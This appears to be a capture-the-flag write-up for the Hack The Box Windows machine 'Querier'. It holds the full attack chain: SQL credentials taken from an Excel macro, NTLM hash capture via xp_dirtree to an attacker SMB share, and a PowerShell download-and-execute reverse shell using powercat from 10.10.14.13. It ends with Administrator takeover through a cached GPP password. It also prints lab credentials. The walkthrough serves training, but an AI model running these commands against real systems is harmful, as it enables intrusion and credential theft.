Querier

OS: Windows, Difficulty: Medium, IP: 10.10.10.125

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 28 02:15:58 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 49670,445,49667,1433,139,49671,49688,5985,135,49669,47001,49664,49665,49666 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.22s latency).

PORT      STATE  SERVICE       VERSION
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
1433/tcp  open   ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-07-27T12:38:20
|_Not valid after:  2049-07-27T12:38:20
|_ssl-date: 2019-07-27T19:40:20+00:00; -1h06m51s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   msrpc         Microsoft Windows RPC
49671/tcp open   msrpc         Microsoft Windows RPC
49688/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/28%OT=135%CT=49688%CU=31917%PV=Y%DS=2%DC=T%G=Y%TM=5D
OS:3CB857%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=
OS:S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DN
OS:W8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN
OS:(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=8
OS:0%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h06m50s, deviation: 0s, median: -1h06m51s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-07-28 01:10:22
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   221.96 ms 10.10.14.1
2   222.13 ms 10.10.10.125

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 28 02:17:19 2019 -- 1 IP address (1 host up) scanned in 81.37 seconds

SMB Enumeration

$ smbmap -u "ANYTHING" -H 10.10.10.125
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445        Name: 10.10.10.125                                      
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    READ ONLY
        Reports                                                 READ ONLY

Checking contents of Reports

$ smbclient -U "ANYTHING" \\\\10.10.10.125\\Reports "" -c 'recurse;ls' ""
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
  .                                   D        0  Tue Jan 29 04:53:48 2019
  ..                                  D        0  Tue Jan 29 04:53:48 2019
  Currency Volume Report.xlsm         A    12229  Mon Jan 28 03:51:34 2019

                6469119 blocks of size 4096. 1612111 blocks available

Fetch the file and unzip the contents

$ smbclient -U "ANYTHING" \\\\10.10.10.125\\Reports "" -c 'get "Currency Volume Report.xlsm" Reports.xlsm' ""
$ unzip Reports.xlsm -d XL_contents
$ ls -la XL_contents/
total 24
drwxr-xr-x 5 jtnydv jtnydv 4096 Jul 28 00:35  .
drwxr-xr-x 3 jtnydv jtnydv 4096 Jul 28 21:09  ..
-rw-r--r-- 1 jtnydv jtnydv 1087 Jan  1  1980 '[Content_Types].xml'
drwxr-xr-x 2 jtnydv jtnydv 4096 Jul 28 00:35  docProps
drwxr-xr-x 2 jtnydv jtnydv 4096 Jul 28 00:35  _rels
drwxr-xr-x 5 jtnydv jtnydv 4096 Jul 28 00:35  xl

$ cat XL_contents/xl/vbaProject.bin                                                                                                                    
...
(- macro to pull data for client volume reports.0n.Conn]8]Xx                                                                                   
 0(<Open 0B@rver=<SELECT * FROM volume; 0%B.6word> 0!> @ MsgBox "connection successful" 6A1$D%FB@H 6B@BkXo,Set rs = conn.Execute("SELECT * @@version;")
XkDriver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6 0(: further testing requiredHAttribute VB
_Name = "ThisWorkbook"                                                                                       

Credentials for the SQL Server: reporting:PcwTWTHRwryjc$c6

impacket/examples at master · fortra/impacketGitHub

All the scripts used can be found at Impacket's Github Repository.

MS SQL Database Enumeration

$ python mssqlclient.py reporting:PcwTWTHRwryjc\$c6@10.10.10.125 -windows-auth
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> xp_cmdshell "ping"
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL> exec master.dbo.xp_dirtree
[-] ERROR(): Line 0: Error executing extended stored procedure: Invalid Parameter

DIRTREE can be run without any restriction, thus we can use this to capture NTLM hashes.

On attacking machine.

sudo python smbserver.py -smb2support -ip 10.10.14.13 myshare .

On victim machine's SQL server

SQL> exec master.dbo.xp_dirtree '\\10.10.14.13\myshare'

Results

[*] Incoming connection (10.10.10.125,49695)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User mssql-svc\QUERIER authenticated successfully
[*] mssql-svc::QUERIER:4141414141414141:a86910d42e63**HASH_VALUE**

This hash can be cracked using JTR or Hashcat to get the credentials for the user mssql-svc i.e mssql-svc:corporate568

$ python mssqlclient.py mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "cmd.exe /c ping 10.10.14.13"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               
Pinging 10.10.14.13 with 32 bytes of data:                                         
Reply from 10.10.14.13: bytes=32 time=226ms TTL=63                                 
Reply from 10.10.14.13: bytes=32 time=219ms TTL=63                                 
Reply from 10.10.14.13: bytes=32 time=229ms TTL=63                                 
Reply from 10.10.14.13: bytes=32 time=231ms TTL=63                                 
NULL                                                                               
Ping statistics for 10.10.14.13:                                                   
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),                           
Approximate round trip times in milli-seconds:                                     
    Minimum = 219ms, Maximum = 231ms, Average = 226ms                              
NULL                                                                               
SQL> 

We have code execution, now we'll use PowerCat to get a reverse shell on the system using xp_cmdshell. Please note, you'll have to host PowerCat on your machine first to download it on the victim machine.

SQL> xp_cmdshell 'powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.13/powercat.ps1");powercat -c 10.10.14.13 -p 9999 -e powershell'

GitHub - besimorhino/powercat: netshell features all in version 2 powershellGitHub

User Own

PS C:\Users\mssql-svc\Desktop> type user.txt
type user.txt
c37b4***

Root Own

We'll download and import all modules from PowerSploit repository and use them for further enumeration.

PowerSploit/Privesc at master · PowerShellMafia/PowerSploitGitHub

Useful Commands:

## Download a file using PowerShell
powershell -command "& { iwr http://10.10.14.13/PowerUp.ps1 -OutFile PowerUp.ps1 }"

## Import a module from a different location
Import-Module -Name C:\Users\mssql-svc\modules\PowerUp.ps1 -Verbose

PS C:\Users\mssql-svc\Desktop> Get-CachedGPPPassword                                               
Get-CachedGPPPassword

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUncles****}
File      : C:\ProgramData\Microsoft\Group 
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

Now we'll use the credentials to execute commands as Administrator.

$Username = 'Administrator'
$Password = 'MyUncles***'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass

Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt } 

PS C:\Users\mssql-svc\modules> Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt } 
Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt } 
b19c3***

Learning Outcome

Learnt a little too much from this box, NTLM hash catching, Powershell Modules, Invoke-Command module, and MS-SQL using Impacket. Amazing Box.